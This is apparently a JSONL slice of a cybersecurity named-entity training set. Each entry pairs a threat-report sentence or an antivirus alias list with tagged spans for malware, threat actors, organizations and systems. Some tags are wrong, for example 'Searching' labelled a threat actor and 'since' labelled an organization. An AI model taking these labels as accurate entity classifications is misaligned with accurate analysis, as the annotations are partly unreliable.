{"text": "A backdoor also known as: TROJ_RAMDO.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_RAMDO.SM0 BehavesLike.Win32.Virut.fh Trojan.Win32.Ramdo Trojan.Ramdo.1 Trojan:Win32/Ramdo.H Backdoor/Win32.Necurs.R100690 Malware-Cryptor.Limpopo Trj/Dtcontx.K Win32/Redyms.AF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002221", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.3AEC Win32.Trojan.WisdomEyes.16070401.9500.9901 Trojan.Win32.Inject.ctprfv W32.Sality.l8GK Trojan.KillProc.28723 Trojan/Nimnul.b Trojan[Ransom]/Win32.PornoAsset Ransom:Win32/Dircrypt.C Trojan.Graftor.D199D8 Trojan.Crypt Trojan.Win32.VB Trj/Dtcontx.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002222", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.Delf.AL Trojan-Downloader.Win32.Banload!O Downloader.Banload.Win32.27568 TROJ_DELF.NOR Win32.Trojan.WisdomEyes.16070401.9500.9934 W32/Downldr2.ATJF Backdoor.Trojan Win32/Pigeon.AYDG Win.Downloader.20057-1 Trojan.Crypt.Delf.AL Trojan-Downloader.Win32.Banload.evb Trojan.Crypt.Delf.AL Trojan.Win32.Drop.dzdiyr Trojan.Win32.A.Downloader.214016.H Troj.Downloader.W32.Banload!c Trojan.Crypt.Delf.AL Backdoor.Win32.Remote.~N Trojan.Crypt.Delf.AL Trojan.MulDrop.12358 BehavesLike.Win32.Worm.dc Trojan/Downloader.Banload.evb TrojanDownloader.Banload.jwv TR/Delf.18944 Trojan[Backdoor]/Win32.Ceckno Trojan.Crypt.Delf.AL Trojan-Downloader.Win32.Banload.evb Trojan.Crypt.Delf.AL TrojanDownloader.Delf Bck/Hupigon.KPG Win32/Delf.NXK Win32.Trojan-downloader.Banload.Dxnj Backdoor.Ceckno!iv4t9tSa5f0 Trojan-Dropper.Delf W32/Delf.NIP!tr.bdr Win32/Trojan.823", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002223", "source": "cyner2_train"}}
{"text": "Bitter APT is a South Asian threat group that commonly targets energy and government sectors; they have been known to target Pakistan, China, Bangladesh, and Saudi Arabia.", "spans": {"THREAT_ACTOR: Bitter APT": [[0, 10]], "THREAT_ACTOR: a South Asian threat group": [[14, 40]], "ORGANIZATION: energy": [[63, 69]], "ORGANIZATION: government sectors;": [[74, 93]]}, "info": {"id": "cyner2_train_002225", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke.Melter.A Win32.Trojan.WisdomEyes.16070401.9500.9752 W32/Joke.SXAT-7954 Joke.Melter.A Joke.Melter.A Joke.Melter.A Heur.Corrupt.PE Joke.Melter.A Joke.Finger.5 not-a-virus:BadJoke.Win32.Melter W32/Joke.BY Joke.Melter.A Joke:Win32/Melter.dam#4 Joke.Melter.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002231", "source": "cyner2_train"}}
{"text": "Prometei, a highly modular botnet with worm-like capabilities that primarily deploys the Monero cryptocurrency miner, has been continuously improved and updated since it was first seen in 2016, posing a persistent threat to organizations.", "spans": {"MALWARE: Prometei,": [[0, 9]], "MALWARE: botnet": [[27, 33]], "MALWARE: the Monero cryptocurrency miner,": [[85, 117]], "ORGANIZATION: organizations.": [[224, 238]]}, "info": {"id": "cyner2_train_002232", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Possible_BASHLITE.SMLBN1 Unix.Trojan.Mirai-5607483-0 Linux.Trojan.Gafgyt.A HEUR:Backdoor.Linux.Gafgyt.y Trojan.Unix.Gafgyt.eikqfj Backdoor.Linux.Gafgyt!c Linux.BackDoor.Fgt.44 Possible_BASHLITE.SMLBN1 Backdoor.Linux.hxx LINUX/Gafgyt.klnbe Trojan.Backdoor.Linux.Gafgyt.1 HEUR:Backdoor.Linux.Gafgyt.y backdoor.linux.gafgyt.y Trojan.Linux.Gafgyt ELF/Gafgyt.WN!tr.bdr Win32/Backdoor.3e0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002233", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Feedel.28672 Trojan.Feedel Troj.W32.Feedel!c Trojan.Feedel.f TR/RedCap.ocnbv Trojan/Win32.Feedel Trj/CI.A Win32.Trojan.Feedel.Ecjy Win32/Trojan.ada", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002234", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OscoleF.Trojan Trojan.AutoIT.Injector.AP Trojan/W32.Cossta.95232.B Trojan.Napolar.A1 Trojan.Cossta.Win32.8040 Win32.Trojan.Napolar.b Infostealer.Napolar Win32/Tnega.dYPTOW BKDR_NAPOLAR.SM0 Win32.Backdoor.Napolar.B Trojan.AutoIT.Injector.AP Trojan.Win32.Cossta.cqikyo Trojan.AutoIT.Injector.AP TrojWare.Win32.Kryptik.BLGK Trojan:W32/Napolar.A Trojan.Hottrend.355 BKDR_NAPOLAR.SM0 BehavesLike.Win32.Trojan.nh Trojan.Win32.Napolar TrojanDropper.Dapato.nxc TR/BAS.Zusy.2144567 Trojan/Win32.Cossta Trojan.AutoIT.Injector.AP Trojan:Win32/Napolar.A Trojan/Win32.Cossta.C211827 Trojan.AutoIT.Injector.AP TScope.Malware-Cryptor.SB Trojan.Napolar Trj/Napolar.A Win32/Napolar.A Trojan.Win32.Cossta.a W32/Cossta.A!tr Win32/Trojan.235", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002235", "source": "cyner2_train"}}
{"text": "A longstanding cyberespionage campaign has been targeting mainly Japanese organizations with its own, custom-developed, malware Backdoor.Daserf.", "spans": {"THREAT_ACTOR: longstanding cyberespionage campaign": [[2, 38]], "ORGANIZATION: Japanese organizations": [[65, 87]], "MALWARE: malware": [[120, 127]]}, "info": {"id": "cyner2_train_002236", "source": "cyner2_train"}}
{"text": "JPCERT/CC has been observing malicious shortcut files that are sent as email attachments to a limited range of organisations since around October 2015.", "spans": {"ORGANIZATION: JPCERT/CC": [[0, 9]], "MALWARE: malicious shortcut files": [[29, 53]], "ORGANIZATION: since": [[125, 130]]}, "info": {"id": "cyner2_train_002237", "source": "cyner2_train"}}
{"text": "Devices infected by these malicious programs usually form a kind of advertising botnet via which advertising Trojans distribute each other as well as the advertised apps.", "spans": {"SYSTEM: Devices": [[0, 7]], "MALWARE: malicious programs": [[26, 44]]}, "info": {"id": "cyner2_train_002238", "source": "cyner2_train"}}
{"text": "We have named this tool that generates these documents DealersChoice.", "spans": {"MALWARE: tool": [[19, 23]], "MALWARE: DealersChoice.": [[55, 69]]}, "info": {"id": "cyner2_train_002241", "source": "cyner2_train"}}
{"text": "As it continues to evolve and develop, Proofpoint researchers have detected it distributing a new remote access Trojan RAT.", "spans": {"ORGANIZATION: Proofpoint researchers": [[39, 61]], "MALWARE: remote access Trojan RAT.": [[98, 123]]}, "info": {"id": "cyner2_train_002242", "source": "cyner2_train"}}
{"text": "This blog dives into the specifics of the ransomware used by the gang, as well as some information regarding their victim naming and shaming website, filled with non-paying victims and stolen data.", "spans": {"MALWARE: ransomware": [[42, 52]], "THREAT_ACTOR: the gang,": [[61, 70]]}, "info": {"id": "cyner2_train_002244", "source": "cyner2_train"}}
{"text": "Qakbot has been around for years, but it's nothing to be complacent about.", "spans": {"MALWARE: Qakbot": [[0, 6]]}, "info": {"id": "cyner2_train_002245", "source": "cyner2_train"}}
{"text": "In 2019, Cl0p Ransomware surfaced as a Ransomware-as-a-Service RaaS model and became notorious due to its advanced techniques.", "spans": {"MALWARE: Cl0p Ransomware": [[9, 24]], "MALWARE: Ransomware-as-a-Service RaaS model": [[39, 73]]}, "info": {"id": "cyner2_train_002247", "source": "cyner2_train"}}
{"text": "These indicator include the use of the same infrastructure for the attacks, similar Tactics, Techniques and Procedures TTPs, the targeting of demographically similar victims and operating geographically within the Indian Subcontinent", "spans": {"SYSTEM: infrastructure": [[44, 58]]}, "info": {"id": "cyner2_train_002249", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VAsidBackup.Worm Worm.Win32.AutoRun!O Worm.Hupigon Win32.Trojan.WisdomEyes.16070401.9500.9977 Worm.Win32.AutoRun.hht Backdoor.W32.IRCBot.lebE Trojan.Packed.650 Trojan.Sasfis.Win32.3750 Backdoor.Win32.Hupigon Worm/AutoRun.kwf Worm/Win32.AutoRun Win32.Virut.ce.57344 Worm.Win32.AutoRun.hht Worm:Win32/Hupigon.D HEUR/Fakon.mwf TScope.Malware-Cryptor.SB W32/Sohanat.JC Win32/AutoRun.Hupigon.L Win32.Worm.Autorun.Dxcn Worm.AutoRun!oW5oVN0v9nU W32/Packed.2D18!tr Win32/Trojan.ce1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002251", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutorunSubot.Worm HackTool.Hoylecann Win.Trojan.HackTool-55 HackTool:Win32/Hoylecann.B Trojan/Win32.HackTool.C178639 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002253", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mbro Ransom_Molock.R004C0DAU18 Ransom_Molock.R004C0DAU18 Trojan-Ransom.Win32.Mbro.bbjy Trojan.Win32.Wecod.eoemqo Trojan.Win32.Z.Wecod.2575498 Win32.Trojan.Mbro.Wnwf BackDoor.Bifrost.30406 Trojan.Magania.Win32.70995 PUA.DRMSoft Trojan.Inject.zdn TR/Ransom.Molock.dkaaw Trojan/Win32.Wecod Ransom:Win32/Molock.A!bit Trojan-Ransom.Win32.Mbro.bbjy Trojan/Win32.Mbro.C2386226 TScope.Trojan.Delf Trojan.PWS.Magania!koUXbeUVt9s", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002254", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Maudi.41880 Trojan.Maudi.ahd Trojan/Maudi.ahd Trojan.Win32.Obfuscated.bbgart Celesign.A Trojan.Win32.Maudi.ahi Trojan.Win32.A.Maudi.41880 Trojan.Obfuscated.based.1 TR/Maudi.C Trojan/Maudi.f Trojan:Win32/Tusmed.A Trojan/Win32.Maudi Trojan.Maudi Trojan.Win32.Tusmed W32/Maudi.AHD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002255", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Barkiofork Trojan/Barkiofork.b Trojan.Zusy.D14CE BKDR_INJECT.SMA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Barkiofork BKDR_INJECT.SMA BackDoor.WebDor.55 TR/Barkiofork.A.28 Trojan:Win32/Barkiofork.A Trojan/Win32.Dllbot.R92635", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002256", "source": "cyner2_train"}}
{"text": "These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.", "spans": {"THREAT_ACTOR: attackers": [[88, 97]]}, "info": {"id": "cyner2_train_002257", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D3DB80 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Ursu.exohow BehavesLike.Win32.Backdoor.jm TR/Dropper.MSIL.hfzet Trojan:MSIL/CeeInject.AE!bit Win-Trojan/MSILKrypt02.Exp Trj/GdSda.A Win32.Trojan.Inject.Auto Trojan.MSIL.Injector MSIL/Injector.QGP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002259", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod8eb.Trojan.3030 Trojan.Downloader.Clisser.B Trojan.Downloader.Clisser.B Downloader.Clisser.Win32.1 Trojan/Downloader.Clisser.b Win32.Trojan.WisdomEyes.151026.9950.9999 W32/Downldr2.BOY Heur.AdvML.C Win32/TrojanDownloader.Clisser.B Trojan-Downloader.Win32.Clisser.b Trojan.Downloader.Clisser.B Trojan.Win32.Clisser.ddmj Trojan.Win32.Downloader.54784.AO[h] Troj.Downloader.W32.Clisser.b!c Trojan.Downloader.Clisser.B TrojWare.Win32.TrojanDownloader.Clisser.B Trojan.Downloader.Clisser.B BehavesLike.Win32.AdwareTopMoxie.qh W32/Downloader.TUUE-5046 TrojanDownloader.Clisser.b TR/Dldr.Clisser.B.1 W32/Clisser.B!tr.dldr Trojan[Downloader]/Win32.Clisser Trojan.Downloader.Clisser.B Trojan/Win32.Clisser.N2115772 TrojanDownloader:Win32/Clisser.B Trojan.Downloader.Clisser.B TrojanDownloader.Clisser Win32.Trojan-downloader.Clisser.Sxeg Trojan.DL.Clisser!glWq8gdbz3E Trojan-Downloader.Win32.Clisser Trojan.Downloader.Clisser.B Downloader.Clisser.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002264", "source": "cyner2_train"}}
{"text": "The Italian language email had a weird attachment: ordine_065.js it would be Order Form in English which appeared quite malicious to me.", "spans": {"MALWARE: malicious": [[120, 129]]}, "info": {"id": "cyner2_train_002265", "source": "cyner2_train"}}
{"text": "The malware may download and execute other binaries.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_002266", "source": "cyner2_train"}}
{"text": "A backdoor also known as: NetTool.Tor Backdoor.Bot Tool.Tor.Win32.4 Win32.Trojan.WisdomEyes.16070401.9500.9989 Backdoor.Trojan not-a-virus:NetTool.Win32.Tor.f Trojan.Win32.MLW.dbcsxd Trojan.DownLoader8.56801 Sefnit.ag W32/Trojan.OTFO-7506 HackTool[NetTool]/Win32.Tor TrojanDropper:Win32/Sefnit.A not-a-virus:NetTool.Win32.Tor.f TrojanDropper.Sefnit Riskware.NetTool! Win32/Trojan.07c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002268", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Floxif.A W32.Pioneer.CZ1 Virus.W32.Pioneer!c PE_FLOXIF.E Win32.Virus.Floxif.a W32/Floxif.B W32.Fixflo.B!inf Win32.Floxif.F PE_FLOXIF.E Win32.Floxif.A Virus.Win32.Pioneer.cz Win32.Floxif.A Virus.Win32.Pioneer.bvrqhu Win32.Floxif.A Virus.Win32.Floxif.A Win32.FloodFix.7 Virus.Floxif.Win32.1 W32/Floxif.B Win32/Pioneer.l Virus/Win32.Pioneer.cz TrojanDropper:Win32/Floxif.A Virus.Win32.Pioneer.cz Win32.Floxif.A Virus.Pioneer.4129 W32/Floxif.A Win32.Floxif.A Win32/Floxif.H Virus.Win32.Pionner.tt W32/Pioneer.CZ!tr Virus.Win32.Pioneer.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002271", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.Inject.Small.C Hacktool.Radinject Trojan.Inject.Small.C Trojan.Inject.Small.C Win32.Trojan.WisdomEyes.16070401.9500.9926 Trojan.Inject.Small.C W32.Cabanas.lmfo Trojan.Inject.Small.C W32/Trojan2.MAPI Trojan/Win32.Inject.R14211 Trojan.Inject.Small.C Trj/CI.A Trojan.Hijacker Win32/Trojan.913", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002276", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Morkus.73728 Trojan.Gambee.BB3 Trojan.Kazy.D13FF6 Trojan.Win32.Morkus.bcz Win32.Trojan.Morkus.Tayq TrojWare.Win32.TrojanClicker.VB.IDP Trojan.DownLoader5.64540 BehavesLike.Win32.Trojan.lt TR/VB.Click.idpmnua Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Gambee.A Trojan.Win32.Morkus.bcz Trojan/Win32.OnlineGameHack.R30007 Win32/TrojanClicker.VB.NYI Trojan-Clicker.Win32.VB W32/VBClicker.NY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002277", "source": "cyner2_train"}}
{"text": "This ransomware is currently being spread by a social engineering exploit kit to trick the user in downloading a malicious executable.", "spans": {"MALWARE: ransomware": [[5, 15]], "MALWARE: social engineering exploit kit": [[47, 77]], "MALWARE: malicious executable.": [[113, 134]]}, "info": {"id": "cyner2_train_002280", "source": "cyner2_train"}}
{"text": "The group's activities show that foreign and domestic espionage and influence on geopolitics are the group's main motives, and not financial gain.", "spans": {"THREAT_ACTOR: group's": [[4, 11], [101, 108]], "THREAT_ACTOR: foreign and domestic espionage": [[33, 63]], "ORGANIZATION: geopolitics": [[81, 92]]}, "info": {"id": "cyner2_train_002281", "source": "cyner2_train"}}
{"text": "Recently Bedep has been observed as the payload dropped by the Anger EK in a series of malvertising campaigns.", "spans": {"MALWARE: Bedep": [[9, 14]], "MALWARE: payload dropped": [[40, 55]], "MALWARE: Anger EK": [[63, 71]], "THREAT_ACTOR: malvertising campaigns.": [[87, 110]]}, "info": {"id": "cyner2_train_002282", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke.Kokegift JOKE_GESCHENK.A W32/Trojan4.EDF Joke.Geschenk JOKE_GESCHENK.A Win.Joke.CokeGift-2 Riskware.Win32.Geschenk.bdflz Joke.Geschenk BehavesLike.Win32.FakeAlertSecurityTool.cc Trojan-Spy.Win32.Zbot W32/Trojan.OREK-1496 JOKE/CokeGift.1 Joke:Win32/Kokegift.A Joke.Geschenk Win32.Trojan.Geschenk.Wvkp Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002286", "source": "cyner2_train"}}
{"text": "A recently disclosed data breach suffered by Mexican fast food restaurant Chipotle was carried out by hackers linked to a group known as FIN7 or Carbanak Group, CyberScoop has learned.", "spans": {"ORGANIZATION: Mexican fast food restaurant Chipotle": [[45, 82]], "THREAT_ACTOR: hackers": [[102, 109]], "THREAT_ACTOR: group": [[122, 127]], "THREAT_ACTOR: FIN7": [[137, 141]], "THREAT_ACTOR: Carbanak Group,": [[145, 160]], "ORGANIZATION: CyberScoop": [[161, 171]]}, "info": {"id": "cyner2_train_002287", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.IEPassVH.Trojan Tool.NetPass.Win32.6782 not-a-virus:PSWTool.Win32.NetPass.wkh Riskware.Win32.NetPass.sphcx Win32.PSWTool.NetPass.~BAAD Program.PwdFind.5 Packed.PePatch.uw Trojan[PSWTool]/Win32.NetPass Application.Heur.cmKfbOVNU5lO not-a-virus:PSWTool.Win32.NetPass.wkh Riskware.PSWTool! not-a-virus:PSWTool.Win32.NetPass", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002289", "source": "cyner2_train"}}
{"text": "Recently we detected new samples and Infrastructure of ISMAgent, a trojan in use by Iranian Threat Group GreenBug.", "spans": {"MALWARE: samples": [[25, 32]], "SYSTEM: Infrastructure of ISMAgent,": [[37, 64]], "MALWARE: trojan": [[67, 73]], "THREAT_ACTOR: Iranian Threat Group GreenBug.": [[84, 114]]}, "info": {"id": "cyner2_train_002292", "source": "cyner2_train"}}
{"text": "Searching its name or one of its aliases Bebloh or Shiotob reveals a good deal of press from that time period along with a few technical analyses in 2009 2012 and 2013", "spans": {"THREAT_ACTOR: Searching": [[0, 9]], "THREAT_ACTOR: Bebloh": [[41, 47]], "THREAT_ACTOR: Shiotob": [[51, 58]]}, "info": {"id": "cyner2_train_002293", "source": "cyner2_train"}}
{"text": "This posting is a follow-up of my previous work on this subject in Pulling Back the Curtains on EncodedCommand PowerShell Attacks", "spans": {}, "info": {"id": "cyner2_train_002294", "source": "cyner2_train"}}
{"text": "It also includes SSL certificate checking aka SSL pinning, allowing it to evade scenarios in which an SSL man-in-the-middle is present.", "spans": {}, "info": {"id": "cyner2_train_002295", "source": "cyner2_train"}}
{"text": "ThreatLabZ has been keeping an eye on RIG and in this post we will cover an example of a full RIG infection cycle.", "spans": {"ORGANIZATION: ThreatLabZ": [[0, 10]], "MALWARE: RIG": [[38, 41]]}, "info": {"id": "cyner2_train_002296", "source": "cyner2_train"}}
{"text": "The Check Point research team identified a new mobile malware targeting millions of Android users.", "spans": {"ORGANIZATION: Check Point research team": [[4, 29]], "MALWARE: new mobile malware": [[43, 61]], "ORGANIZATION: Android users.": [[84, 98]]}, "info": {"id": "cyner2_train_002297", "source": "cyner2_train"}}
{"text": "The target is CERT in the military domain.", "spans": {"ORGANIZATION: CERT": [[14, 18]], "ORGANIZATION: the military domain.": [[22, 42]]}, "info": {"id": "cyner2_train_002298", "source": "cyner2_train"}}
{"text": "We have found evidence that the actors use a combination of legitimate tools and batch scripts to deploy the Disttrack payload to hostnames known to the attackers to exist in the targeted network.", "spans": {"THREAT_ACTOR: the actors": [[28, 38]], "MALWARE: tools": [[71, 76]], "MALWARE: Disttrack payload": [[109, 126]], "THREAT_ACTOR: the attackers": [[149, 162]], "SYSTEM: the targeted network.": [[175, 196]]}, "info": {"id": "cyner2_train_002302", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.JSTL TrojanDownloader.Mabjet Trojan.Downloader.JSTL Backdoor.W32.PcClient.lpjJ Trojan/Downloader.FlyStudio.az Trojan.Downloader.JSTL Win.Trojan.Flystudio-2191 Trojan.Downloader.JSTL Trojan.Downloader.JSTL Trojan.Win32.FlyStudio.cxpswl Trojan.Downloader.JSTL Adware.Downware.4022 Downloader.FlyStudio.Win32.2885 Trojan-Downloader.Flystudio TR/Dldr.FlyStudio.AZ Win32.Trojan.Fakeapp.Dvfy Win32/Trojan.51f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002306", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Emotet.CD Trojan/W32.Dovs.159744.B Win32.Malware!Drop Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.KZPI-4363 Trojan.Emotet TSPY_EMOTET.THAOIAL Win.Trojan.Emotet-6421984-0 Trojan.Win32.Dovs.frh Trojan.Emotet.CD Trojan.Win32.Dovs.exinig Win32.Trojan.Dovs.Wwnx Trojan.Emotet.CD Trojan.Emotet.CD TSPY_EMOTET.THAOIAL BehavesLike.Win32.Upatre.ch Trojan.Dovs.bke TR/Crypt.ZPACK.blsak W32/Kryptik.GBTT!tr Trojan.Emotet.CD Trojan.Win32.Z.Emotet.159744.B Trojan.Win32.Dovs.frh Trojan/Win32.Dovs.C2353482 Trojan.Emotet.CD Win32.Malware!Drop Trojan.Emotet Win32/Emotet.AZ Trojan-Banker.Emotet PE.Heur.InvalidSig Win32.Trojan-Spy.Emotet.KA Trj/RnkBend.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002307", "source": "cyner2_train"}}
{"text": "While we monitor phishing campaigns used to distribute threats such as Dridex, Upatre, and Cryptowall, targeted phishing attacks are more convincing because the format of the message is personalized to the targeted user.", "spans": {"THREAT_ACTOR: phishing campaigns": [[17, 35]], "MALWARE: threats": [[55, 62]], "MALWARE: Dridex, Upatre,": [[71, 86]], "MALWARE: Cryptowall,": [[91, 102]], "THREAT_ACTOR: phishing attacks": [[112, 128]], "ORGANIZATION: targeted user.": [[206, 220]]}, "info": {"id": "cyner2_train_002308", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.AB1B MemScan:Trojan.Spy.Togfer.S Trojan-Dropper/W32.Small.45568.F TrojanDropper.Small Dropper.Small.Win32.1780 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Wingua.B Backdoor.Trojan MemScan:Trojan.Spy.Togfer.S Trojan-Dropper.Win32.Small.ep MemScan:Trojan.Spy.Togfer.S Trojan.Win32.Small.unzq Trojan.Win32.Z.Small.45568.Z Troj.Dropper.W32.Small.ep!c MemScan:Trojan.Spy.Togfer.S TrojWare.Win32.TrojanDropper.Small.EP MemScan:Trojan.Spy.Togfer.S Trojan.MulDrop.752 TROJ_SMALL.EP BehavesLike.Win32.Sdbot.pc Trojan/Dropper.Small.ep Worm.Win32.Randex.a W32/Wingua.TBPD-6936 Packed.Morphine.a DR/Small.EP.1 Trojan[Dropper]/Win32.Small Trojan.Spy.Togfer.S Trojan-Dropper.Win32.Small.ep MemScan:Trojan.Spy.Togfer.S TrojanSpy.Tofger Trj/Small.A Win32/TrojanDropper.Small.EP Win32.Trojan-dropper.Small.Amvx Trojan.DR.Small!QLjE4qGURJY W32/Small.EP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002309", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Delf.Win32.49957 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Adclicker Trojan-Spy.Win32.Delf.tr TrojWare.Win32.PSW.QQPass.~HYJ Trojan.DownLoader.origin BehavesLike.Win32.Dropper.lc Trojan-Dropper.Delf Trojan[Spy]/Win32.Delf Trojan-Spy.Win32.Delf.tr Trojan/Win32.OnlineGameHack.R233 Trojan.PWS.Ceekat!HLFjv+sb6fY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002311", "source": "cyner2_train"}}
{"text": "Researchers with Tencent Security recently disclosed details about Swearing Trojan, a mobile banking malware that attacked users in China.", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "ORGANIZATION: Tencent Security": [[17, 33]], "MALWARE: Swearing Trojan,": [[67, 83]], "MALWARE: mobile banking malware": [[86, 108]], "ORGANIZATION: users": [[123, 128]]}, "info": {"id": "cyner2_train_002312", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Dolan.fam Backdoor/W32.Dolan.20480.D Backdoor.Dolan.fam Backdoor.Aoldoor Dolan.AA BKDR_AOLDOOR.A Backdoor.Win32.Dolan Backdoor.Dolan.G Backdoor.Win32.A.Dolan.20480[h] PE:Backdoor.Dolan.b!1173745952 Backdoor.Dolan.fam Backdoor.Win32.Dolan Backdoor.Dolan.fam BackDoor.Dolan Backdoor.Dolan.Win32.52 BKDR_AOLDOOR.A W32/Risk.PEXC-1723 BDS/Dolan.A.27 Trojan[Backdoor]/Win32.Dolan Backdoor.Dolan.fam Win-Trojan/Dolan.20480.D Backdoor.Dolan.fam Trojan.VBRA.01573 Backdoor.Win32.Dolan W32/Bdoor.ARY!tr.bdr BackDoor.Dolan.S Backdoor.Win32.Dolan.Alrb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002313", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.AlLight.1.0.A Trojan-PWS/W32.AlLight.140800 PWS-LamLite.cfg Trojan.AlLight.Win32.34 Trojan/PSW.AlLight.10.a TROJ_LAMLITE.A TROJ_LAMLITE.A Trojan.PWS.AlLight.1.0.A Trojan-PSW.Win32.AlLight.10.a Trojan.PWS.AlLight.1.0.A Trojan.Win32.AlLight.dbgt Trojan.Win32.PSWAlLight.140800 Troj.PSW32.W.AlLight.10.a!c Trojan.PWS.AlLight.1.0.A TrojWare.Win32.PSW.AlLight.A Trojan.PWS.AlLight.1.0.A BackDoor.AntiLame.10 BehavesLike.Win32.Dropper.cc W32/Risk.CXII-8326 Backdoor/Antilam.10 W32.Trojan.Phisher-LamLite TR/PSW.AlLight.10.A Trojan[PSW]/Win32.AlLight Trojan.PWS.AlLight.1.0.A Trojan-PSW.Win32.AlLight.10.a PWS:Win32/LammerLight.B Backdoor.RAT.AntiLamer TrojanPSW.AlLight Win32/PSW.AlLight.10.A Win32.Trojan-qqpass.Qqrob.Pjxn Trojan.PWS.AlLight!3dq9kq5oal8 Backdoor.Win32.Antilam W32/EQSteal.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FlyStudio.Win32.14198 Trojan/FlyStudio.onh Win32/Oflwr.A!crypt Win32.Trojan.FlyStudio.F Riskware.Win32.ProcPatcher.djqzww Trojan.Win32.Z.Zusy.1400832.C Trojan.NtRootKit.18405 W32/Trojan.VHRL-9383 Variant.Zusy.hm RiskWare[RiskTool]/Win32.ProcPatcher.a Trojan.Zusy.D1CA4C TrojanDownloader:Win32/Nefhop.A Trj/CI.A Riskware.ProcPatcher! Win32/Trojan.Spy.6da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002315", "source": "cyner2_train"}}
{"text": "The Dyre financial Trojan has emerged over the past year to become one of the most potent financial fraud tools in operation.", "spans": {"MALWARE: Dyre financial Trojan": [[4, 25]], "MALWARE: financial fraud tools": [[90, 111]]}, "info": {"id": "cyner2_train_002316", "source": "cyner2_train"}}
{"text": "For all registered domains we could identify NameCheap, Inc. as the registrar based in the United States.", "spans": {"ORGANIZATION: NameCheap, Inc.": [[45, 60]]}, "info": {"id": "cyner2_train_002317", "source": "cyner2_train"}}
{"text": "The timestamp seems valid and close to the documented infection timeline.", "spans": {}, "info": {"id": "cyner2_train_002318", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TR/Dropper.MSIL.fdxny PWS:MSIL/Stimilina.R!bit Trojan/Win32.Bladabindi.R203992 Spyware.PasswordStealer Trojan.MSIL.Spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002319", "source": "cyner2_train"}}
